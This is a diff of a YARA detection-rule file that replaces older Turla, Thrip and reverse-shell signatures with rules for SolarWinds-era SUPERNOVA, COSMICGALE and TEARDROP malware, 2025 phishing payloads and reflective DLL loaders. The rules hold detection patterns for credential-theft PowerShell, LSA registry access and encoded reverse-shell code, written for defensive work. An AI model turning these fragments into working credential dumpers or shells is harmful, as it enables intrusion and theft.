+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10KB and pe.imports ( "mscoree.dll" , "_CorDllMain" ) and $httpmodule and $context and all of ( $compile* ) and all of ( $string* )
 }
-
-rule SIGNATURE_BASE_Turlamosquito_Mal_3 : FILE
+rule SIGNATURE_BASE_APT_Webshell_SUPERNOVA_2 : FILE
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c83e0a93-3f8d-572d-ac1a-92fef0b3d3f6"
-		date = "2018-02-22"
+		description = "This rule is looking for specific strings related to SUPERNOVA. SUPERNOVA is a .NET web shell backdoor masquerading as a legitimate SolarWinds web service handler. SUPERNOVA inspects and responds to HTTP requests with the appropriate HTTP query strings, Cookies, and/or HTML form values (e.g. named codes, class, method, and args)."
+		author = "FireEye"
+		id = "c39bf9ba-fd62-5619-92b6-1633375ef197"
+		date = "2020-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L54-L77"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L100-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0f59c130b500625466da0c8b5bfd84051ee59a3b6261ee3d990d4c355b10672b"
-		score = 75
-		quality = 85
+		logic_hash = "96e344bd2ba3ee07784852db3e9935352762c2fa7b6be88f00cac10a90706ffc"
+		score = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "443cd03b37fca8a5df1bbaa6320649b441ca50d1c1fcc4f5a7b94b95040c73d1"
 
 	strings:
-		$x1 = "InstructionerDLL.dll" fullword ascii
-		$s1 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
-		$s2 = "/scripts/m/query.php?id=" fullword wide
-		$s3 = "SELECT * FROM AntiVirusProduct" fullword ascii
-		$s4 = "Microsoft Update" fullword wide
+		$dynamic = "DynamicRun"
+		$solar = "Solarwinds" nocase
+		$string1 = "codes"
+		$string2 = "clazz"
+		$string3 = "method"
+		$string4 = "args"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "88488fe0b8bcd6e379dea6433bb5d7d8" or ( pe.exports ( "InstallRoutineW" ) and pe.exports ( "StartRoutine" ) ) or $x1 or 3 of them )
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10KB and 3 of ( $string* ) and $dynamic and $solar
 }
+rule SIGNATURE_BASE_APT_Hacktool_PS1_COSMICGALE_1
+{
+	meta:
+		description = "This rule detects various unique strings related to COSMICGALE. COSMICGALE is a credential theft and reconnaissance PowerShell script that collects credentials using the publicly available Get-PassHashes routine. COSMICGALE clears log files, writes acquired data to a hard coded path, and encrypts the file with a password."
+		author = "FireEye"
+		id = "c094943c-288e-5835-8066-8e95a992c76c"
+		date = "2020-12-14"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L119-L140"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "c7b4d3c29d57b8db8d21e3a436c83617bc3fe14e66ccc1500b33a3774f09ee12"
+		score = 85
+		quality = 40
+		tags = ""
 
-rule SIGNATURE_BASE_Turlamosquito_Mal_4 : FILE
+	strings:
+		$sr1 = /\[byte\[\]\]@\([\x09\x20]{0,32}0xaa[\x09\x20]{0,32},[\x09\x20]{0,32}0xd3[\x09\x20]{0,32},[\x09\x20]{0,32}0xb4[\x09\x20]{0,32},[\x09\x20]{0,32}0x35[\x09\x20]{0,32},/ ascii nocase wide
+		$sr2 = /\[bitconverter\]::toint32\(\$\w{1,64}\[0x0c..0x0f\][\x09\x20]{0,32},[\x09\x20]{0,32}0\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}0xcc\x3b/ ascii nocase wide
+		$sr3 = /\[byte\[\]\]\(\$\w{1,64}\.padright\(\d{1,2}\)\.substring\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,2}\)\.tochararray\(\)\)/ ascii nocase wide
+		$ss1 = "[text.encoding]::ascii.getbytes(\"ntpassword\x600\");" ascii nocase wide
+		$ss2 = "system\\currentcontrolset\\control\\lsa\\$_" ascii nocase wide
+		$ss3 = "[security.cryptography.md5]::create()" ascii nocase wide
+		$ss4 = "[system.security.principal.windowsidentity]::getcurrent().name" ascii nocase wide
+		$ss5 = "out-file" ascii nocase wide
+		$ss6 = "convertto-securestring" ascii nocase wide
+
+	condition:
+		all of them
+}
+rule SIGNATURE_BASE_APT_Dropper_Raw64_TEARDROP_1
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1d5c32b3-0316-525c-9386-222917144251"
-		date = "2018-02-22"
+		description = "This rule looks for portions of the TEARDROP backdoor that are vital to how it functions. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory."
+		author = "FireEye"
+		id = "88adad58-ba16-5996-9ea8-ea356c3ed5b2"
+		date = "2020-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L79-L90"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L141-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4765b912258491f38c03513204d9af8bc62c37df2fe583e371cbbeff6fc12298"
-		score = 75
+		logic_hash = "6ab5197e7a1a123055b361a2ef79f8a77a7935606fccc8f163ea5914c94cd14d"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b362b235539b762734a1833c7e6c366c1b46474f05dc17b3a631b3bff95a5eec"
+		tags = ""
+
+	strings:
+		$sb1 = { C7 44 24 ?? 80 00 00 00 [0-64] BA 00 00 00 80 [0-32] 48 8D 0D [4-32] FF 15 [4] 48 83 F8 FF [2-64] 41 B8 40 00 00 00 [0-64] FF 15 [4-5] 85 C0 7? ?? 80 3D [4] FF }
+		$sb2 = { 80 3D [4] D8 [2-32] 41 B8 04 00 00 00 [0-32] C7 44 24 ?? 4A 46 49 46 [0-32] E8 [4-5] 85 C0 [2-32] C6 05 [4] 6A C6 05 [4] 70 C6 05 [4] 65 C6 05 [4] 67 }
+		$sb3 = { BA [4] 48 89 ?? E8 [4] 41 B8 [4] 48 89 ?? 48 89 ?? E8 [4] 85 C0 7? [1-32] 8B 44 24 ?? 48 8B ?? 24 [1-16] 48 01 C8 [0-32] FF D0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and pe.imphash ( ) == "17b328245e2874a76c2f46f9a92c3bad"
+		all of them
 }
-
-rule SIGNATURE_BASE_Turlamosquito_Mal_5 : FILE
+rule SIGNATURE_BASE_APT_Dropper_Win64_TEARDROP_1 : FILE
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f3a35c9-b0f0-5ca6-8b34-19e2d45305f2"
-		date = "2018-02-22"
+		description = "This rule is intended match specific sequences of opcode found within TEARDROP, including those that decode the embedded payload. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory. (comment by Nextron: prone to False Positives)"
+		author = "FireEye"
+		id = "15dfdb74-5ca3-5bc6-be7a-730333b03ba5"
+		date = "2020-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L92-L103"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L157-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5b0366194410f36c47dd41f6a36c45edbce75e3ddad19520b17bed59513e1dbc"
-		score = 75
+		logic_hash = "a1fa9b9c700601d10cb77ec714b972f04308de615dfc519f680fc956227cc11d"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "26a1a42bc74e14887616f9d6048c17b1b4231466716a6426e7162426e1a08030"
+
+	strings:
+		$loc_4218FE24A5 = { 48 89 C8 45 0F B6 4C 0A 30 }
+		$loc_4218FE36CA = { 48 C1 E0 04 83 C3 01 48 01 E8 8B 48 28 8B 50 30 44 8B 40 2C 48 01 F1 4C 01 FA }
+		$loc_4218FE2747 = { C6 05 ?? ?? ?? ?? 6A C6 05 ?? ?? ?? ?? 70 C6 05 ?? ?? ?? ?? 65 C6 05 ?? ?? ?? ?? 67 }
+		$loc_5551D725A0 = { 48 89 C8 45 0F B6 4C 0A 30 48 89 CE 44 89 CF 48 F7 E3 48 C1 EA 05 48 8D 04 92 48 8D 04 42 48 C1 E0 04 48 29 C6 }
+		$loc_5551D726F6 = { 53 4F 46 54 57 41 52 45 ?? ?? ?? ?? 66 74 5C 43 ?? ?? ?? ?? 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "ac40cf7479f53a4754ac6481a4f24e57"
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Turlamosquito_Mal_6 : FILE
+rule SIGNATURE_BASE_MAL_PHISH_Shellcode_Enc_Payload_Feb25 : FILE
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1c320b60-ec7a-5f87-b871-f55924351f8f"
-		date = "2018-02-22"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L105-L127"
+		description = "Detects unknown of phishing-delivered malware"
+		author = "X__Junior"
+		id = "8459c5ba-37ec-59bd-8d4a-5ab7b6bb4553"
+		date = "2025-02-14"
+		modified = "2025-03-20"
+		reference = "https://x.com/dtcert/status/1890384162818802135"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_phish_feb25.yar#L1-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ca6ae4313ad8f009b17188aa7184ff01a4b7e35926f3f68dc3aea12bffb9bb1"
-		score = 75
+		hash = "247e6a648bb22d35095ba02ef4af8cfe0a4cdfa25271117414ff2e3a21021886"
+		logic_hash = "144323294a8353956adf7a9b2a316e1e7606e882f85b8187c016d5acdcc254cc"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b79cdf929d4a340bdd5f29b3aeccd3c65e39540d4529b64e50ebeacd9cdee5e9"
 
 	strings:
-		$a1 = "/scripts/m/query.php?id=" fullword wide
-		$a2 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
-		$a3 = "GetUserNameW fails" fullword wide
-		$s1 = "QVSWQQ" fullword ascii
-		$s2 = "SRRRQP" fullword ascii
-		$s3 = "QSVVQQ" fullword ascii
+		$op1 = { 48 89 EA FF D0 48 89 E9 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? 48 89 C7 48 89 C3 48 89 EA F3 A4 48 89 C1 41 FF D4 31 C9 FF D3}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 2 of ( $a* ) or 4 of them )
+		uint16( 0 ) == 0x5a4d and $op1
 }
-
-rule SIGNATURE_BASE_APT_Turlamosquito_MAL_Oct22_1 : FILE
+rule SIGNATURE_BASE_MAL_PHISH_Final_Payload_Feb25
 {
 	meta:
-		description = "Detects Turla Mosquito malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f5ad0c0f-81ca-5157-aefb-ead049ada30d"
-		date = "2022-10-25"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_mosquito.yar#L129-L156"
+		description = "Detects possible final payload of phishing-delivered malware, where embedded shellcode is used to decrypt and execute the payload after user-supplied password input."
+		author = "X__Junior"
+		id = "9014e1f2-09c2-5ba0-8b7c-6ae8c069d1f7"
+		date = "2025-02-14"
+		modified = "2025-03-20"
+		reference = "https://x.com/dtcert/status/1890384162818802135"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_phish_feb25.yar#L16-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fbaca774d6398aac7c171a5d87aa456a1921c1b80449d06f392b088db33ee845"
+		hash = "de384aba6b0c6800095eb530954aa718d4ed96cccfc0b1e5e4d01404f3518a77"
+		logic_hash = "3251d68a019d873987966d46c9e474e5a1ebbca4a33a8bf1e3c3ce119db8ab8c"
 		score = 80
 		quality = 85
-		tags = "FILE"
-		hash1 = "6b9e48e3f4873cfb95639d9944fe60e3b056daaa2ea914add14c982e3e11128b"
-		hash2 = "b868b674476418bbdffbe0f3d617d1cce4c2b9dae0eaf3414e538376523e8405"
-		hash3 = "e7fd14ca45818044690ca67f201cc8cfb916ccc941a105927fc4c932c72b425d"
+		tags = ""
 
 	strings:
-		$s1 = "Logger32.dll" ascii fullword
-		$s4 = " executing %u command on drive %martCommand : CWin32ApiErrorExce" wide
-		$s5 = "Unsupported drive!!!" ascii fullword
-		$s7 = "D:\\Build_SVN\\PC_MAGICIAN_4." ascii fullword
-		$op1 = { 40 cc 8b 8b 06 cc 55 00 70 8b 10 10 33 51 04 46 04 64 }
-		$op2 = { c3 10 e8 50 04 00 cc ff 8d 00 69 8d 75 ff 68 ec 6a 4d }
-		$op3 = { e8 64 a1 6e 00 64 a1 c2 04 08 75 40 73 1d 8b ff cc 10 89 cc 8b c3 cc af }
+		$s1 = "%lu: %s %s" wide
+		$s2 = "(Direct Inbound)" wide
+		$s3 = "(Primary Domain)" wide
+		$s4 = "(Forest Tree Root" wide
+		$s5 = "(Native Mode)" wide
+		$s6 = "(In Forest)" wide
+		$s7 = "(None)" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "073235ae6dfbb1bf5db68a039a7b7726" or all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Gen_Python_Reverse_Shell : FILE
+rule SIGNATURE_BASE_SUSP_Sysinternals_Desktops_Anomaly_Feb25 : FILE
 {
 	meta:
-		description = "Python Base64 encoded reverse shell"
-		author = "John Lambert @JohnLaTwC"
-		id = "dda831ae-d0ca-5d5a-bdb3-e7c146a770b4"
-		date = "2018-02-24"
-		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/en/file/9ec5102bcbabc45f2aa7775464f33019cfbe9d766b1332ee675957c923a17efd/analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_python_reverse_shell.yara#L1-L36"
+		description = "Detects anomalies in Sysinternals Desktops binaries"
+		author = "Florian Roth"
+		id = "5a586222-9263-5079-be48-9cfa464440d4"
+		date = "2025-02-14"
+		modified = "2025-03-20"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_phish_feb25.yar#L37-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "12b1424265cd0ea62b8dd5c08933f1285a156d906df6c31ca9a94fbc303f248e"
-		score = 75
-		quality = 58
+		hash = "5b8f64e090c7c9012e656c222682dfae7910669c7b7afaca35829cd1cc2eac17"
+		hash = "d0f7f3f58e0dfcfd81235379bb5a236f40be490207d3bf45f190a264879090db"
+		hash = "a83dc4d69a3de72aed4d1933db2ca120657f06adc6683346afbd267b8b7d27d0"
+		hash = "9ebfe694914d337304edded8b6406bd3fbff1d4ee110ef3a8bf95c3fb5de7c38"
+		hash = "9a5b9d89686de129a7b1970d5804f0f174156143ccfcd2cf669451c1ad4ab97e"
+		hash = "ff82c4c679c5486aed2d66a802682245a1e9cd7d6ceb65fa0e7b222f902998e8"
+		hash = "1da91d2570329f9e214f51bc633283f10bd55a145b7b3d254e03175fd86292d9"
+		logic_hash = "e17b831c9644cfe6a4c82537a01cb937007308d94eb2b78f97f5fbad3546404a"
+		score = 70
+		quality = 85
 		tags = "FILE"
-		hash1 = "9ec5102bcbabc45f2aa7775464f33019cfbe9d766b1332ee675957c923a17efd"
-		hash2 = "bfb5c622a3352bb71b86df81c45ccefaa68b9f7cc0a3577e8013aad951308f12"
 
 	strings:
-		$h1 = "import base64" fullword ascii
-		$s1 = "b64decode" fullword ascii
-		$s2 = "lambda" fullword ascii
-		$s3 = "version_info" fullword ascii
-		$enc_x0 = /(AG8AYwBrAGUAdAAuAFMATwBDAEsAXwBTAFQAUgBFAEEATQ|b2NrZXQuU09DS19TVFJFQU|c29ja2V0LlNPQ0tfU1RSRUFN|cwBvAGMAawBlAHQALgBTAE8AQwBLAF8AUwBUAFIARQBBAE0A|MAbwBjAGsAZQB0AC4AUwBPAEMASwBfAFMAVABSAEUAQQBNA|NvY2tldC5TT0NLX1NUUkVBT)/ ascii
-		$enc_x1 = /(4AYwBvAG4AbgBlAGMAdAAoACgA|5jb25uZWN0KC|AGMAbwBuAG4AZQBjAHQAKAAoA|LgBjAG8AbgBuAGUAYwB0ACgAKA|LmNvbm5lY3QoK|Y29ubmVjdCgo)/
-		$enc_x2 = /(AGkAbQBlAC4AcwBsAGUAZQBwA|aW1lLnNsZWVw|dABpAG0AZQAuAHMAbABlAGUAcA|dGltZS5zbGVlc|QAaQBtAGUALgBzAGwAZQBlAHAA|RpbWUuc2xlZX)/
-		$enc_x3 = /(4AcgBlAGMAdg|5yZWN2|AHIAZQBjAHYA|cmVjd|LgByAGUAYwB2A|LnJlY3)/
+		$s1 = "Software\\Sysinternals\\Desktops" wide fullword
+		$s2 = "Sysinternals Desktops" wide fullword
+		$s3 = "http://www.sysinternals.com" wide fullword
 
 	condition:
-		uint32be( 0 ) == 0x696d706f and $h1 at 0 and filesize < 40KB and all of ( $s* ) and all of ( $enc_x* )
+		uint16( 0 ) == 0x5a4d and filesize > 350KB and all of them
 }
-rule SIGNATURE_BASE_Duqu1_5_Modules
+rule SIGNATURE_BASE_SUSP_PE_Compromised_Certificate_Feb25 : FILE
 {
 	meta:
-		description = "Detection for Duqu 1.5 modules"
-		author = "Silas Cutler (havex@chronicle.security)"
-		id = "7239f5e1-c08f-566c-8998-f7dacc2c4a29"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu1_5_modules.yar#L2-L17"
+		description = "Detects suspicious PE files signed with a certificate used in a widespread phishing attack in February 2025"
+		author = "Jonathan Peters"
+		id = "2e6ad630-b24e-53b2-8ffe-622c51914568"
+		date = "2025-02-14"
+		modified = "2025-03-20"
+		reference = "https://x.com/DTCERT/status/1890384162818802135"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_phish_feb25.yar#L62-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bb3961e2b473c22c3d5939adeb86819eb846ccd07f5736abb5e897918580aace"
-		logic_hash = "795107e227cfb73f6ea09fcdb078f8b57a30d47a2cb702b2d47cc936dea5ae9f"
-		score = 75
+		hash = "5b8f64e090c7c9012e656c222682dfae7910669c7b7afaca35829cd1cc2eac17"
+		hash = "d0f7f3f58e0dfcfd81235379bb5a236f40be490207d3bf45f190a264879090db"
+		hash = "a83dc4d69a3de72aed4d1933db2ca120657f06adc6683346afbd267b8b7d27d0"
+		hash = "9ebfe694914d337304edded8b6406bd3fbff1d4ee110ef3a8bf95c3fb5de7c38"
+		hash = "9a5b9d89686de129a7b1970d5804f0f174156143ccfcd2cf669451c1ad4ab97e"
+		hash = "ff82c4c679c5486aed2d66a802682245a1e9cd7d6ceb65fa0e7b222f902998e8"
+		hash = "1da91d2570329f9e214f51bc633283f10bd55a145b7b3d254e03175fd86292d9"
+		logic_hash = "8f352ce00bcb64427bef89a9fc180d2451aeb4aa05432881a4754b4fb503c94a"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$c1 = "%s(%d)disk(%d)fdisk(%d)"
-		$c2 = "\\Device\\Floppy%d" wide
-		$c3 = "BrokenAudio" wide
-		$m1 = { 81 3F E9 18 4B 7E}
-		$m2 = { 81 BC 18 F8 04 00 00 B3 20 EA B4 }
+		$sb1 = { 44 B8 66 73 57 BB 95 65 1D 61 D0 61 }
+		$sb2 = { 4F 23 43 D9 61 54 B9 41 DB 0A 26 B2 }
+		$sb3 = { 40 A3 62 E3 50 68 91 19 F5 2E C3 4C }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 20MB and 1 of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_1 : FILE
+
+rule SIGNATURE_BASE_Reflectiveloader : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b506069-8185-5dc0-bf64-90646f6bab6b"
-		date = "2018-06-21"
-		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L13-L29"
+		id = "d8a601d7-b99a-59dc-bfc7-bf0e35b5d8bd"
+		date = "2017-07-17"
+		modified = "2021-03-15"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L14-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6e94111abe83aa500bfa35a3a7c2d43c3ed4011bc540401f047e84cfc27204ca"
-		score = 75
+		logic_hash = "4d839674f8d8181b11af964a7c84a9eb8f07623500dd2695fca9ca3b15c247e2"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "59509a17d516813350fe1683ca6b9727bd96dd81ce3435484a5a53b472ff4ae9"
+		nodeepdive = 1
 
 	strings:
-		$s1 = "idocback.dll" fullword ascii
-		$s2 = "constructor or from DllMain." fullword ascii
-		$s3 = "appmgmt" fullword ascii
-		$s4 = "chksrv" fullword ascii
+		$x1 = "ReflectiveLoader" fullword ascii
+		$x2 = "ReflectivLoader.dll" fullword ascii
+		$x3 = "?ReflectiveLoader@@" ascii
+		$x4 = "reflective_dll.x64.dll" fullword ascii
+		$x5 = "reflective_dll.dll" fullword ascii
+		$fp1 = "Sentinel Labs, Inc." wide
+		$fp2 = "Panda Security, S.L." wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or pe.exports ( "ReflectiveLoader" ) or pe.exports ( "_ReflectiveLoader@4" ) or pe.exports ( "?ReflectiveLoader@@YGKPAX@Z" ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_2 : FILE
+
+rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_1 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects Reflective DLL Loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bc1cfcc8-64a0-5da0-8ff7-147da8a3af0b"
-		date = "2018-06-21"
+		id = "9a2674f8-5fdb-5a4d-a2b9-41e874939616"
+		date = "2017-08-20"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L31-L46"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L53-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ddd3dee11e25ea40fa3cc578c6a836ea850359a5914d5eb5d16ea4340827b91b"
+		logic_hash = "9ad012dda538d37242c92c6ed16a0fb1cd9252a2884387f8e7d9c80b041c8fea"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1fc9f7065856cd8dc99b6f46cf0953adf90e2c42a3b65374bf7b50274fb200cc"
+		hash1 = "f2f85855914345eec629e6fc5333cf325a620531d1441313292924a88564e320"
 
 	strings:
-		$s1 = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" fullword ascii
-		$s2 = "ProbeScriptFint" fullword wide
-		$s3 = "C:\\WINDOWS\\system32\\cmd.exe" fullword ascii
+		$x1 = "\\Release\\reflective_dll.pdb" ascii
+		$x2 = "reflective_dll.x64.dll" fullword ascii
+		$s3 = "DLL Injection" fullword ascii
+		$s4 = "?ReflectiveLoader@@YA_KPEAX@Z" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "4bf489ae7d1e6575f5bb81ae4d10862f" or pe.exports ( "?ReflectiveLoader@@YA_KPEAX@Z" ) or ( 1 of ( $x* ) or 2 of them ) ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_3 : FILE
+rule SIGNATURE_BASE_DLL_Injector_Lynx : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects Lynx DLL Injector"
 		author = "Florian Roth (Nextron Systems)"
-		id = "67ea7ed1-954f-5b3e-b058-452be3b6fdfa"
-		date = "2018-06-21"
+		id = "7a4c9949-c701-5ae2-a8b1-3ef0b08c1c04"
+		date = "2017-08-20"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L48-L62"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L78-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f1617829ccf7da6ee2e9f692fbf1f61d3f1c6a17103db85190d6a8b4fca69328"
+		logic_hash = "1904b152c42126abd87671747dc2733e2a5e2a01ab55346c131fb430fe5ba58e"
 		score = 75
 		quality = 85
 		tags = "FILE"
